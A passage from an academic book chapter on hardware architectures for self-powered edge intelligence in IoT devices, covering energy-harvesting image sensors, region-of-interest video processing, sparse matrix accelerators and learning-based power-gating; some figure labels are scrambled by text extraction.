possessing on-sensor intelligence. Similarly, IoTs with edge intelligence in a smart
office can personalize workspaces without transmitting personal data to the cloud.
Figure 1 shows the hypothesized evolution stages of edge intelligence, similar
to Zhou et al. (2019), but from a hardware perspective. At the first level of edge
intelligence, the training of intelligence models is performed only in the cloud
nodes, whereas the cloud and edge devices collaborate for inference. Especially, at
this level of edge intelligence, edge devices are utilized to locally extract and only
transmit the actionable information, thereby reducing the necessary communication
bandwidth demand between the edge and cloud. Applications at this level of
edge intelligence include keyword spotting in smart home devices such as Google
Home (Google Home) and activity recognition in smart cameras such as Blink
(Amazon Blink). By locally identifying the actionable inputs, a cloud node need
not continuously receive data from the edges, such as from Alexa or Ring, but
it is invoked only when an action may be desired. At the second level of edge
intelligence, even though the training of intelligence models is restricted to the
cloud, edge nodes perform end-to-end inference. Applications at this level include
autonomous navigation of small drones in remote environments of limited cloud
bandwidth (Shukla et al. 2021). An end-to-end edge intelligence is needed to
operate on dynamically evolving inputs where a latency in the actions may lead
to fatal consequences such as drone collision. Since latency from the cloud-based
inference in remote environments may be high due to lower bandwidth, or at
worse unpredictable, an end-to-end in situ edge intelligence is necessary. At the
third level of edge intelligence, both training and inference capabilities locally
within the edge device are needed. Although the edge device may inherit a cloud-
trained initial intelligence model, it must update the model locally to adapt against
application surroundings. Applications at this level include continuous learning or
reinforcement learning in edge devices where the devices continuously update their
intelligence model by interacting with the environment.
Fig. 1 Evolution of edge intelligence. At level 1, edge devices collaborate with cloud for
inference. At level 2, edge devices perform end-to-end inference. At level 3, edge devices perform
both training and inference locally
92 A. R. Trivedi et al.
. Harvest energy from the . Identify and focus only on . Dynamically learn and adapt
application environment inputs of higher importance, against input activity
. Opportunistically utilize i.e., regions-of-interest patterns
integrated sensors, such as . Exploit data and model . Intelligent power-gate idle
image sensors, to extract sparsity to improve units to minimize power
energy from device inputs computational efficiency leakage
Fig. 2 A pathway for self-powered edge intelligence. In this chapter, complementary techniques
on energy scavenging, computational energy efficiency, and minimization of energy leakage are
reviewed for pervasive edge intelligence
Despite the intriguing prospects of edge intelligence in IoTs, most edge nodes are
constrained in area and energy, limiting their budget for on-edge intelligence capa-
bilities. Subsequently, emerging architectural techniques are reviewed to address
this challenge from complementary viewpoints (Fig. 2). First, in section “Archi-
tectures for Energy Harvesting in IoT Edges”, architectures to enhance the energy
budget for on-edge intelligence by harvesting energy from the environment are
reviewed. Specifically, techniques to leverage IoT sensors for opportunistically
scavenge energy are discussed when the sensor inputs need not be processed. Sec-
ond, in section “ROI-Aware Image Processing Architecture”, architectures that can
identify and focus upon regions of interest (ROI) are reviewed. By focusing only on
ROIs, the computational efficiency of edge intelligence can improve dramatically. In
section “Architectural Support for Handling Sparsity in IoT Devices”, architectures
that can exploit sparsity in input and parametric models for intelligence processing
are reviewed. Since perception domains and computing models for IoT edge devices
are often sparse, sparsity-aware computations in this section will minimize the
computing and storage resource demand for on-edge intelligence. Readers can
also refer to chapters in this book on approximate computing and subthreshold
computing which are complementary techniques to our approach to enhance
computational energy efficiency in this chapter. Additionally, since IoT edge nodes
have low activity, in section “Architectures for Power-Gating-Based Active Leakage
Control”, learning-based architectures are reviewed to learn and adapt against vary-
ing application activities and environmental conditions to minimize power wastage.
Synergistic integration of architectural techniques on energy harvesting, efficient
workload processing, and efficient energy resource utilization will lay the founda-
tions of self-sustained edge intelligence for next-generation intelligence IoTs.
In IoT applications, wireless image sensor nodes are generally deployed in areas
where human intervention for battery replacement is a costly operation (Law et al.
3 Architectures for Self-Powered Edge Intelligence 93
2011). Therefore, sensor nodes are expected to operate for an extended period with
limited energy sources. A longer lifetime can be achieved by harvesting ambient
energy in the environment (Cevik et al. 2015). However, energy harvesting generally
requires additional devices (thermoelectric, piezoelectric, photovoltaic, etc.). An
alternative approach to a self-powered sensor node can be using the sensor array
itself as an energy harvesting device. Since the pixel array is used for sensing only
for a limited fraction of time, it can be configured to harvest energy during idle time
and store harvested energy in a battery or supercapacitor. While a few studies have
shown the feasibility of using an image pixel array for harvesting (Law et al. 2011;
Kim et al. 2014; Wang and Leon-Salas 2015; Nayar et al. 2015; Chiou and Hsieh
2015), these studies only considered powering a pixel array and peripherals.
2 mm
Specification Value Energy
3.4 ms
Pre-
processor 3.0 µJ
processor
array C ADC, peripherals
Energy 5.7
(from simulation) Tx
TX consumption 4.5 µJ SRAM leakage E =
controller
Oscillator controller per frame Image processor 3.0 1.2 µW x 15 sec = 18.0 µJ
(µJ, @230fps) SRAM 0.24 µJ
Tx Controller 4.5 Time
Energy
Power management unit SRAM 0.24 harvested
Harvested E =
2.1 µW x 15 sec = 31.5 µJ
Energy 1st Frame Power gating / 2nd Frame
2.1µW @200klx
harvesting processing Energy harvesting processing
Fig. 3 (a) Die photo of the sensor node, (b) key performance parameters of the system, (c) and a
diagram showing the consumed/harvested energy over time
94 A. R. Trivedi et al.
An AMM unit in the system controls the switching between the sensor’s
imaging and harvesting mode and transitions between the regulators’ boost and buck
mode. The mode switching can be externally controlled or autonomously managed
based on available stored energy. In energy-autonomous imaging mode, the mode
switching signal is self-generated by the system. Such a decision is made by sensing
the voltage drop in the energy storage and assessing how much energy is required
to process the next frame. If the energy level in the storage is below that minimum
limit, the system decides to harvest before allowing the next frame to capture. Thus,
in the self-powered case, the frame rate becomes a system-defined variable and
varies depending on available energy. In practical operations, the demanded frame
rate can push the system into sense, but if enough energy is not available, the AMM
will stop sensing and go to harvesting mode.
A test chip is designed in a 0.13 μm CMOS technology node, as depicted in Fig. 3a.
It can process image frames with 128 × 96 pixels at the maximum frame rate
of 230 frames/s. The design demonstrates the peak harvested power of 2.1 µW at
the sensor array’s output. Based on the peak harvested power and the measured
power dissipation of the different components, the sensor can be self-powered
while processing a frame every 15 s (Fig. 3c). The maximum frame rate that can
be supported by energy harvesting is affected by various system factors. The
factors include pipelining architecture, SRAM supply voltage, pixel size, and power
converter efficiency.
performance. Increased pixel area is also expected to improve the dynamic range of
image sensing. The major disadvantage of increasing unit pixel size is the reduced
image resolution per array area. To keep the same number of pixels (resolution),
more sensor array area will be needed. Similarly, to keep the array area the same,
the number of pixels in the array must be reduced. While lower image resolution
results in lower perceptual quality to the users, it has an advantage in system energy
consumption because it reduces the computation energy and transmission energy
per frame, enhancing the self-powered frame rate.
Video input
Image sensor Frame buffer
Split into 8x8 MB
Video sensor node
Block buffer Receiver node
Input video
Non-ROI MB
Region-based processor 8x8 MB
Pixel # MSB LSB
MJPEG decoder
Moving object detection 1 1 1 0 1 0 0 1 0 QF
ROI detector Non-ROI 2 Non-ROI
Sum of foreground pixels Threshold ROI … …
ROI Bit padding (left-shift)
(activity level) in an MB
64 Bit padding
Truncation Bit truncation (right-shift) Truncation
(truncation factor = 4)
Thresholding N Rate Truncation (truncation factor = 4) factor
Pixel # MSB LSB
(activity level > threshold ?) drop controller factor 1 1 1 0 1 0 0 0 0
Pixel # MSB LSB 2
Y 1 0 0 0 0 1 1 0 1 … …
2 64
Encoder MJPEG encoder … … Decoded video
64
QF
Wireless transmitter
Video transmission
(a) (b) (c)
Fig. 4 (a) A wireless image sensor platform with a block-wise region-based processing model (b)
proposed bit-truncation method
When the ROI is defined as a region with moving objects, detection of the ROI can
be divided into two categories depending on the complexity and robustness: low-
power moving object detection and noise-robust moving object detection.
Once the ROI is detected, a video can be processed more efficiently by focusing on
the ROI. The ROI-based coding methods can be divided into temporal and spatial
methods.
transmitted. To address these drawbacks, Lai et al. (2004) have proposed the multi-
rate approach that transmits non-ROI blocks with a frame rate lower than that of
ROI blocks. However, whenever the frames with non-ROI blocks are transmitted,
the transmit volume increases significantly, requiring a large buffer to accommodate
high fluctuation in the encoding rate. Moreover, for correct reconstruction of the
image frames without non-ROI blocks, a sensor node needs to transmit block
identifiers that contain the location (or sequence number) of the blocks.
control scheme, may result in significant quality degradation when the channel’s
data rate is lower than that of the encoder. To address this problem, Haratcherev
et al. proposed cross-layer signaling, which informs the encoder of the channel data
rate so that the encoder can change its data rate as well (feedback control scheme)
(Haratcherev and Taal 2005). However, suppose the feedback control scheme uses
conventional rate-controlled encoders. In that case, it controls the source data rate
by changing only the quality of the entire video, which may result in a low-
quality ROI (content-unaware feedback control scheme). Although the feedback
controller with existing ROI-based processing approaches (i.e., the content-aware
and energy-unaware feedback control scheme) can optimize the quality of the
ROI, it is subject to an energy increase in a channel rate decrease or a signal
power increase. Therefore, achieving an optimal system-level energy-quality trade-
off under varying channel conditions requires system-wide feedback control that
adaptively tunes parameters of an encoder and a transmitter.
control scheme optimizes the system performance in two ways. First, the controller
guarantees bounded transmission energy and quality distortion due to a wireless
channel by reducing the source data rate according to the transmission parameters
satisfying the BER target. Also, source rate control using both the number of MBs
to encode and the quality of these MBs further optimizes the ROI and the energy
consumption in the computation.
Fig. 5 ROI-based rate controller design (a) tied to H.264/AVC and (b) based on a simple encoder
(MJPEG). (c) Diagram of the low-power online rate controller
3 Architectures for Self-Powered Edge Intelligence 101
For GEMM operations, two input matrices A and B are provided and the output
matrix Y is generated. In computing the output matrix Y, two approaches can be
used: (i) inner product approach and (ii) outer product approach. Each approach has
its advantages and disadvantages; thus, proper selection is needed depending on the
sparsity level and on-chip memory size.
K−1
yij = aik · bkj , (1)
k=0
Fig. 6 Two approaches for matrix multiplication: (a) inner product approach and (b) outer product
approach
3 Architectures for Self-Powered Edge Intelligence 103
where (i, k), (k, j ), and (i, j ) are coordinates of an element in matrix A, B, and
Y, respectively. The required number of multiply-accumulate (MAC) operations for
computing Y becomes K × N 2 . Note that the addition of aik · bkj terms happens
right after the multiplication is performed. Thus, the inner product approach shows
high output reuse (or partial sum reuse). However, the inner product approach has
low input reuse for one of two input matrices, e.g., a row vector of A is stationary
to the processing engines, while a column vector of B changes for each dot product.
When the GEMM operation becomes sparse, it becomes a challenge to match the
index of a column in ai and a row in bj , i.e., index “k” in Eq. (1).
K−1
K−1
Y= Yk = ak ⊗ bk , (2)
k=0 k=0
where “k” is index of each partial product, ak is the kth column vector of A, and
bk is the kth row vector of B. Unlike the inner product approach, the addition
of partial products occurs after all multiplications are completed. Thus, the outer
product approach shows high input reuse but poor output reuse as all Yk ’s are kept
in on-chip or off-chip memory for the reduced operation. As shown in Fig. 6, to
obtain the same output y1 in the inner product approach, Y1 and Y3 must be added
together to produce “y1 = y11 + y03 = a0 · b3 + a1 · b4 ”.
As zeroes dominate in a given matrix, i.e., the sparsity of the matrix increases,
fetching the entire matrix in the original dense format significantly reduces the
effective memory bandwidth. To utilize the memory bandwidth with useful data,
various types of sparse data format have been proposed (Bank and Douglas 1993;
Robinson and Cherry 1967; Qin et al. 2020; Kung et al. 2019). The coordinate list
stores a list of {row, column, value} tuples where the data is typically stored in
row-major order. The size of metadata to locate nonzero values in the coordinate list
format is large as it needs to store both row and column coordinates. To reduce the
metadata size of indexing either rows or columns, compressed sparse row (CSR) or
compressed sparse column (CSC) is used (Eisenstat et al. 1984). In the CSR format,
rows’ extents (row pointers) are stored instead of row coordinates. The row pointer
identifies the number of nonzero values in that row. The CSC format is similar to
CSR format but instead storing row indices and the extents of columns (column
pointers).
104 A. R. Trivedi et al.
7.0
6.0 HNI RLE-4 RLE-2 Bitmap
Compression Ratio
Fig. 7 The resulting compression ratio using various sparse matrix formats depending on the
sparsity of a 2048 × 2048 weight matrix
There is another set of sparse matrix formats that does not explicitly store
coordinates of nonzero values. In run-length encoding (RLE), consecutive zeroes
between two nonzero values are clustered together, and the zero count is stored as
an indicator with a predefined bit-width, e.g., 2 bit or 4 bit (Robinson and Cherry
1967). For instance, with a 4-bit run-length code, up to 15 zeroes per decoding
cycle can be skipped. The simplest way of identifying nonzero values is by storing a
bitmap with marking 1 for nonzero values (Qin et al. 2020). The size of the bitmap,
however, remains the same even at a high sparsity level. The compression ratio can
be improved by applying the Huffman coding on the bitmap, i.e., Huffman-coded
nonzero indication (HNI) (Kung et al. 2019).
The compression ratios using different sparse matrix formats are compared in
Fig. 7. The simulated matrix size is 2048 × 2048 at varying sparsity levels. For
sparse formats, the data includes nonzero values as well as the metadata for their
coordination. Thus, it is beneficial to use a sparse matrix format when the matrix
density is less than 70%, i.e., sparsity above 30%. At low sparsity levels, i.e., sparsity
below 50%, using the coordinate list or CSC/CSR format is still worse than using the
dense format. The HNI or Bitmap shows the highest compression ratio at sparsity
from 20% to 50%. When the matrix becomes highly sparse, i.e., above 80%, the
RLE-4 format becomes as efficient as the HNI format. Note that the HNI format
shows the highest compression ratio at any sparsity levels. Reducing the total data
size as much as possible is important as accessing data at memory blocks consumes
significantly higher energy compared to arithmetic units (Horowitz). For example,
accessing 32-bit data from 32-KB SRAM consumes 50× higher energy compared
to adding two 32-bit integers in 45-nm CMOS technology (Table 2).
Computing with sparse matrices puts a challenge in the design of processing units
as it introduces the irregular data access pattern and index matching overhead.
3 Architectures for Self-Powered Edge Intelligence 105
Leading Non-zero
Detection Unit Processing Unit
Act Value
NZ Index Act Queue Activation Value (aik)
Act 0~3
From NE
Weight (bkj)
Col Start/End
Act 0
Nzero Detect
Sparse Decoder
Address
From SE Even Ptr SRAM
Act 1 Leading Matrix
From NW SRAM
Act 2 Odd Ptr SRAM Address Addr Partial Sum
From SW (B)
Act 3 Accum Register
Relative
Index
Fig. 8 The hardware architecture for SpGEMM operations using CSC format (Han et al. 2016b).
It uses LND unit to skip zeroes in a row vector a of matrix A
Reg
Reg
Lv-1 Huffman LUT Lv-1 Huffman LUT 2
1 Shifter Shifter
Lv-0 LUT Lv-0 LUT Lv-0 LUT Lv-0 LUT 0 2b 2b
2b # of Bits # of Bits 8b r)
Sel Used to Look At dd
(A
Decoder Decoder Decoder Decoder Relative Addr 4b
MAC MAC MAC MAC
1 8b Huffman
0 ta LUT Enable
Selective Partial Sum Logic Da 1b
8b
1b
Symbol
(a) (b)
Fig. 9 The hardware accelerator for SpGEMM operations with HNI format (Kung et al. 2019).
(a) The overall architecture of sparse processing engine with the hierarchical Huffman LUTs. (b)
The design of a parallel Huffman decoder for real-time decoding. (c) The Huffman tree separated
by multiple levels with depth = 2 and (d) its associated multilevel Huffman LUTs
the decoded symbol, a MAC unit becomes busy for that number of cycles. With the
symbol “10010110,” the corresponding MAC unit computes for the next four cycles.
By using more efficient HNI format, the performance improves by 9.48∼27.57% on
language modeling benchmarks compared to the hardware using CSC format (Kung
et al. 2019).
Instead of finding the next intersection between two vectors at a time, ExTen-
sor (Hegde et al. 2019) utilizes a tree representation to efficiently skip ineffectual
coordinates. The hardware architecture to efficiently find intersections between
3 Architectures for Self-Powered Edge Intelligence 107
1
Iterate() SkipTo() SkipTo() Iterate() scoord Coordinates Addresses
Priority Decoder
<
Scanner Scanner
......
MUX
A B
RD
Coordinates in A Coordinates in B < Request
A B Metadata
Intersect Unit Registers Storage
Fig. 10 (a) The hardware support for the bidirectional skipping mechanism for the optimized
intersect architecture. (b) The scanner design, at which SkipTo() function is performed, is shown
in detail
<
A.SkipTo(9)
Stream B 3 4 5 Stream B 3 3 B EOS
.po
p()
A.SkipTo(3)
(a)
6
4
2
0
n 1 k h t 0 S 7 0 3 c 2 3 4 n
co ec pwt nsp can ma1 HY stk1 stk1 stk1 acx et_L et_L et_L mea
c _e hips c o r db1 cs c s cs b e N N N e o
ma s p b b b m le x x x g
a ale ale
(b)
Fig. 11 The skip operation supported by ExTensor (Hegde et al. 2019). (a) An example of
SkipTo() function calls. (b) The performance improvement by using ExTensor over Intel CPU
with Math Kernel Library (MKL)
two coordinate streams A and B is shown in Fig. 10a. The scanner iterates over a
stream of coordinates. Note that a high-dimensional tensor consists of many streams
which are hierarchically intersected. To allow more efficient stream generation,
SkipTo() function is implemented in a hardware module. The bidirectional skipping
mechanism between scanners A and B allows a multistep jump as shown in Fig. 11a.
An input coordinate (scoord) from another scanner is compared to “T” consecutive
elements in the FIFO (Fig. 10b). The value “T” determines the efficiency of skipping
mechanism. The intersect unit simply compares two coordinates from streams A and
B and outputs the coordinate if they are identical, i.e., intersection hit. Otherwise,
108 A. R. Trivedi et al.
Load A Load B 0 1 2 3 4 5 6 7
B
b0 b2 Input Data Input Data Psum ID y0 y0 y0 y0 y0 y1 y1 y1
A a 0 a 1 a 3 a4 b0 b1
0 a0 a1 a2
a3 a4 0 0
. 0 b3
b1 0
0 0
y1
y0
ctrl ctrl
left_in right_in
Vertical Diagonal
a 0 a 1 a3 a4 a 0 a 1 a 3 a4
- - - - - b1 b 0 -
Sel(Out) Sel(Fwd)
Fig. 12 The hardware architecture for processing irregular SpGEMM operations. (a) The overall
architecture of SIGMA with Benes distribution network (Qin et al. 2020). (b) Forwarding adder
network for the flexible output reduction
the intersect unit pops the smaller element at either FIFO A or B. Compared to
computing SpGEMM on CPU with MKL support, ExTensor with the skipping
mechanism improves the performance by 3.1× on average (Fig. 11b).
Recently, a two-dimensional systolic array is widely used for processing GEMM
operations (Jouppi et al. 2017). However, the systolic array is not well suited at deal-
ing with sparse and irregular matrices. To flexibly compute SpGEMM operations
between two matrices with arbitrary shapes, SIGMA (Qin et al. 2020) presents a 2D
processing array with a flexible distribution network and a programmable reduction
network (Fig. 12). To design a flexible distribution network, SIGMA adopts a Benes
network (Arora et al. 1990). The Benes network is a non-blocking multistage
network allowing any source to connect with any destination without any contention
(Fig. 12a). First, the consecutive nonzero data from matrix A, a0 , a1 , a3 , a4 , are
loaded to the multiplicand buffer. Note that a2 is not loaded as SIGMA identifies
rows with all zeroes in matrix B, i.e., the fourth row in the example. Then, the
corresponding nonzero values from matrix B are loaded to the multiplier buffer by
programming the Benes network. For b0 , the path is programmed to be “V-V-D-V.”
For b1 , it is programmed to be “V-V-V-V.” As the outputs from multipliers may have
different destination indices, a forwarding adder network is used to reduce partial
sums flexibly. The example in Fig. 12b shows how two different output values, y0
and y1 , can be computed via the forwarding adder network.
maximizes the input data reuse by performing all necessary multiplications when
two vectors are loaded. The issue with the outer product approach is in the merge
phase that requires all intermediate partial products to be reduced to a single output
matrix.
In OuterSPACE (Pal et al. 2018), a set of linked lists is used to store intermediate
partial products. An example of the linked lists during the process of outer product-
based matrix multiplication between matrices A and B is provided in Fig. 13a. The
example assumes four processing elements in each processing tile (Fig. 14). Each
PE multiplies one nonzero element from a column of A with all the nonzeroes in
the matched row of B. The partial products are stored in a linked list pointed by a
row pointer (Fig. 13b). The merge phase scans the linked lists pointed by the row
pointers and adds them together when the column index matches. To do so, the
Matrix A
y00 y02 y03 y02
a00 a02 PE0 Row0
a11 PE3 0 2 3 2
a22 a00 b00 b02 b03 a02 b22 y11 y13
a31 a33 Row1
a22 1 3
Matrix B PE1 PE0
y22
b00 b02 b03 PE1 Row2
b13 a11 b11 b13 2
b11
a31 a33 b31
b22 y33 y31
Row3
b31 PE2 3 1
(a) (b)
Fig. 13 (a) An example of outer product matrix multiplication and (b) the linked list representa-
tion of partial products used in OuterSPACE (Pal et al. 2018). In this example, four PEs are assumed
where each PE multiplies one nonzero element from a column of A with all the nonzeroes in the
matched row of B (compressed row mode)
Processing Tile
Local Ctrl
SPM
Ctrl Unit
ALU
Work Q
PE0 PE1 PE2 PE3 ... PE12 PE13 PE14 PE15
Request Q
SPM SPM SPM SPM ... SPM SPM SPM SPM 16-Port
Cache
(or SPM)
Fig. 14 The architecture of a processing tile in OuterSPACE accelerator (Pal et al. 2018). The
processing tile consists of 16 processing elements with dedicated scratch pad memories
110 A. R. Trivedi et al.
head of each row is fetched, and it is sorted by column index. Then the smallest
indexed element from the list is stored in the memory location. This merge strategy
in OuterSPACE focuses on minimizing the memory traffic. The crossbar attached
to scratch pad memories is utilized to move data that need to be summed together.
Also, it acts as a flexible router node to communicate with higher-level caches.
Yet, the outer product approach described in Fig. 13a shows poor output reuse as
“K” partial product maps need to be merged for A ∈ RN ×K and B ∈ RK×N . To
reduce the number of merge operations, SpArch (Zhang et al. 2020) presents matrix
condensing along with the Huffman tree scheduler. First, the matrix condensing is
used to reduce the number of partial product maps (Fig. 15a). As nonzeroes are
shifted to the leftmost column, elements with the same column index are color-
coded for visualization purpose. One drawback with the matrix condensing is that
the data reuse factor may reduce at matrix B as multiple rows may be needed. To
mitigate the fetching overhead, a row prefetcher is utilized that loads the required
rows in matrix B while streaming in the data from matrix A. Even with the matrix
condensing a large number of partial product maps can be produced. The optimized
merge order significantly reduces the data to be loaded from DRAM, and this is
done by the Huffman tree scheduler in SpArch (Fig. 15b). With all these design
techniques together, SpArch reduces DRAM access by 2.8× over OuterSPACE.
41 15 15 13
A B C
12 9 7 13
D E F
6 3 2 2
G H I
2 2 2
J K L
(b)
Fig. 15 The hardware accelerator for SpGEMM, named SpArch (Zhang et al. 2020), using matrix
condensing, row prefetcher, and the Huffman tree scheduler. (a) Condensed outer product operation
on the same example from Fig. 13a. (b) An example of a four-way Huffman tree scheduler that
minimizes the memory traffic
3 Architectures for Self-Powered Edge Intelligence 111
In most applications, IoT devices are seldom active. Consider smart home IoT
devices such as Google Home (Google Home) or Amazon Blink (Amazon Blink).
These devices are rarely fully functional depending on user activity and environ-
mental conditions. In such IoT devices, the overall system will comprise a smaller
always-on component which continuously listens to user input or environmental
activity. However, the majority of the system components need not be constantly
active. Nonetheless, if an idle system component is connected to the power grid,
even though it doesn’t consume any active (i.e., dynamic) power, it will still
consume leakage power. Leakage power is dissipated due to various leakage
mechanisms in transistors, such as subthreshold leakage, gate tunneling, and body
junction leakage. Due to these leakage currents, transistors continue to dissipate
static power even when they have been turned off. Especially for the advanced
CMOS technologies, leakage power’s dissipation can become quite significant due
to aggravating short-channel effects in transistors.
Overview of Power-Gating
The leakage power of a system has become a critical concern. To mitigate leakage
power, gate control over the channel can be improved using silicon on insulator,
FinFET, and nanowire style in transistors. Alternate switching mechanisms such
as Tunnel FET (Trivedi and Mukhopadhyay 2014; Trivedi et al. 2014a, 2015) and
magnetic (Nasrin et al. 2019) have been explored to operate transistors at lower
supply voltage (VDD), thereby also resulting in a lower leakage current. However,
in addition to the above technology-level solutions, leakage power can also be
minimized by architecture-level techniques and mainly by disconnecting or power-
gating idle system components from the global power grid (Jiang et al. 2005).
Figure 16a shows a p-type power-gating scheme where a top PMOS transistor
can disconnect the idle system components from the main power grid to minimize
leakage power dissipation. Similarly, an n-type power-gating in Fig. 16b will
disconnect idle system components from the ground grid, essentially achieving the
same leakage power-saving benefit. Various micro-architectural control signals such
as block access signal for caches, clock gating signals for cores, or input/output data
phases of LUTs for FPGA can be used to detect if a system component is idle and
then apply power-gating to the unit (Hu et al. 2004).
Power-gating can also be performed at various scales. In a coarse-grained power-
gating configuration, the power-gating transistor can be shared for all or many
system components and can be controlled by a single power-gating signal. On
the other hand, in a fine-grained power-gating configuration, the entire system can
be partitioned into many power-gating domains, each controlled independently by
respective power-gating signals. Compared to coarse-grained power-gating, fine-
grained power-gating is more attractive for IoT devices to save leakage energy
112 A. R. Trivedi et al.
Virtual-VDD Functional-
1 0 1 unit
Fig. 16 Power-gating in (a) n-type and (b) p-type modes to minimize leakage power in a digital
system by disconnecting idle components from power/ground grid
even during brief idle periods. By finely detecting the activity of respective system
components, fine-grained power-gating schemes can find more opportunities to save
leakage power than a coarse-grained scheme that waits for the entire system to be
inactive before invoking power-gating.
Although power-gating is a simple and effective method to save leakage power, the
method comes with a unique set of challenges and trade-offs. Consider power-gating
of an inverter chain in Fig. 17a. As the circuit transits between typical and power-
gated modes, various additional capacitances, shown to the figure’s right, switch,
resulting in power-gating energy overheads. For example, the capacitance at virtual-
VDD contributes to power-gating overhead. Note that a capacitance at virtual-VDD
arises only due to power-gating implementation. In a typical implementation, the
3 Architectures for Self-Powered Edge Intelligence 113
virtual-VDD node will not be present. Furthermore, since many transistors are
connected to the virtual-VDD, wire interconnect capacitance, Cwire , and transistor
parasitic capacitance, CS , at virtual-VDD are significant and therefore can lead to
considerable power-gating overhead. Meanwhile, if power-gating overheads exceed
leakage saving, the scheme becomes inefficient.
Figure 17b shows the typical transients of virtual-VDD and leakage current
as power-gating is invoked. Virtual-VDD is the local supply node of the power-
gated domain which is separated from the global supply grid due to power-gating
transistor. In the figure, as soon as the power-gating transistor is turned off, virtual-
VDD begins to drop. The leakage current of the logic block at virtual-VDD
discharges the node, while the turned-off power-gating transistor does not replenish
it at the same rate. Eventually, virtual-VDD settles to a lower voltage VPG where
the leakage current of power-gating transistor and underlying logic unit is balanced.
Also note that as soon as power-gating is invoked, leakage current from the system
drops but then slowly rises to settle to a new level, Ileak,PG . The power-gating
transistor governs the leakage current of a power-gated system. In the beginning,
the power-gating transistor is turned off and has a minimal source-to-drain voltage.
Therefore, the current through the power-gated unit is relatively small. However,
as virtual-VDD settles to VPG , a sufficient source-to-drain voltage develops across
the power-gating transistor, resulting in the equilibrium leakage current, Ileak,PG ,
through the system.
Voltage variations at the virtual-VDD also induce power overhead at many other
circuit nodes. For example, consider the intermediate nodes in the circuit below
holding a logic one. As virtual-VDD drops to VPG , these nodes are also discharged.
When the circuit becomes active again, all these nodes’ potential must be recharged
to supply voltage, VDD. Therefore, these logic capacitances, CFU,1 , also contribute
to dynamic energy overheads due to power-gating.
A critical design requirement for the power-gating transistor is also that it should
present a minimal resistance when the underlying logic unit is active. If the power-
gating transistor’s resistance is high, it will reduce the voltage swing (i.e., effective
supply voltage) across the logic unit, resulting in a lower performance. Therefore,
it is a standard practice to dedicate sufficient area for power-gating transistors
to minimize theirs on resistance. Typically, the power-gating of a system leads
to ∼5–10% of area overhead. Meanwhile, since the power-gating transistors are
large, toggling their gate potential itself becomes energy expensive. Moreover, to
switch power-gating transistors with high performance, a dedicated inverter buffer
chain is necessary. Both high gate capacitance of power-gating transistor and its
driver circuits lead to power-gating overheads as captured by Cgate,PG and Cinv,PG
capacitance in Fig. 17a.
Under a suboptimal design, power-gating can deteriorate the voltage swing at the
connected logic unit and induce significant noise at the power grid (Kim et al. 2003).
Figure 18 shows this pictorially whereas Logic-1 wakes up, a sudden demand for
charging virtual-VDD and intermediate circuit nodes induces a current rush leading
to supply voltage droop at the unit. Without a robust power management circuit,
voltage droop can also create supply noise spreading throughout the power grid.
114 A. R. Trivedi et al.
Decoupling
capacitances
Logic-1 Logic-2
To mitigate such power supply noise, various techniques have been proposed. For
example, Agarwal et al. (2006) uses multiple sleep modes to adapt against leakage
saving and wake-up delay trade-off. Kahng et al. (2013) and Akl et al. (2009) use
a staggered turn on of power-gating transistors. In the scheme, a power-gating
transistor is implemented through an array of parallel instances. When the logic
unit activates, the instances of a power-gating transistor are turned on sequentially
in a staggered fashion, not all of a sudden, to reduce the current rush. However,
due to a staggering turn-on, the power-gated logic unit requires more time to turn
on, resulting in performance degradation. In another set of techniques, a decoupling
capacitor is added to VDD or virtual-VDD node to minimize the proliferation of
supply noise through the grid (Charania et al. 2012). Decoupling capacitances at
the power grid reduces the supply grid’s time constant, filtering out high-frequency
noise. However, this solution also incurs several limitations. First, the placement
of sufficient decoupling capacitance incurs a large area. Second, if the decoupling
capacitance is placed at the global supply grid, the capacitors are exposed to voltage
drop and therefore introduce their own leakage. Alternatively, if the decoupling
capacitance is placed at the virtual-VDD, it slows down the power-gating domain’s
transition between active and inactive modes. Decoupling capacitance at the virtual-
VDD also contributes to power-gating overheads.
The leakage energy-saving due to power-gating is strongly dependent on process,
voltage, and temperature (PVT) conditions and activity pattern of the logic unit.
For example, at high temperatures or low threshold voltage, the leakage current
through transistors is high. Therefore, potentially higher leakage power-savings can
be achieved under these conditions. Similarly, if transistors are low threshold voltage
conditions due to process variability, they will dissipate more leakage, and therefore
power-gating can become more effective. When the overheads of power-gating
exceed the leakage energy-saving, power-gating becomes inefficient. A power-
gating scheme that doesn’t intrinsically account for such leakage power-saving
and transition energy overhead trade-offs is bound to be suboptimal under varying
3 Architectures for Self-Powered Edge Intelligence 115
PVT and system activity conditions. Even more, if the power-gating architecture
is excessively complex, it will have its significant energy overheads, reducing the
benefit of power-gating.
Overall, even though power-gating is an elegant and straightforward approach
to minimize leakage power wastage in IoT devices, the technique requires several
deeper considerations, as illustrated above. In the following, a unique learning-
based approach is discussed to dynamically characterize trade-offs between energy-
saving and power-gating overhead so that a self-adaptive architecture only invokes
power-gating when it is efficient to do so.
VDD
VREF Transmission
VDD
Idle signal -gate
TXP
(IDL)
RCH
VBIAS ST
CTRL
IDL CST VREF
TXN
Comparator
Edge detector RD
(a)
V(ST)
VREF
IDL
time Tobs
(b)
signal of the power-gated domain, i.e., IDL. When IDL signal transitions from
zero to one (0→1), it indicates a power-gating opportunity for the system. Mode
transitions in a power-gated domain incurs energy overhead (Eov,tran ); meanwhile,
leakage savings depend on PVT conditions as well as the duration/activity of IDL
signal. Power-gating efficiency learner mimics this behavior using a two-transistor
replica of the power-gated domain. With a 0→1 transition in IDL signal, transistor
TXN in the learner circuit is activated through the edge detector and reduces the
voltage (VST ) of the node ST. On the other hand, when IDL = 1, the subthreshold
biased transistor TXP increases VST . Therefore, TXN and TXP contend to regulate
the potential of the node ST. The transition energy of power-gated domain, i.e.,
Eov/tran , is reflected
by the drop in VST induced by TXN , whereas the leakage
energy-saving Pleak dt is reflected by the increase in VST induced by TXP .
TXN and TXP can be designed to ensure that VST follows Eov/tran and Pleak in
the power-gated domain. This can be achieved by designing them based on the
following equations:
I (T XP ) ∝ Pleak (3a)
TP W × I (T XN ) ∝ Eov/tran (3b)
Here, I(TXP ) is the current through TXP . TPW is the pulse width generated by
the edge detector. I(TXN ) is the on-current of TXN . INPG and IPG are the leakage
currents of the power-gated domain in the non-power-gated and power-gated modes,
respectively. To minimize the area of the learner circuit, TXN can be of the minimum
size, and TXP can be determined by Eq. 3c. By following the above equations,
the learner circuit also intrinsically tracks the PVT variations in power domain in
arbitrating power-gating efficiency. Due to its small area, the learner circuit can be
embedded within the power domain to sense local PVT conditions. If the power-
gated domain temperature rises, the current through subthreshold biased TXP also
increases, resulting in a faster charging rate of the node ST. Therefore, under the
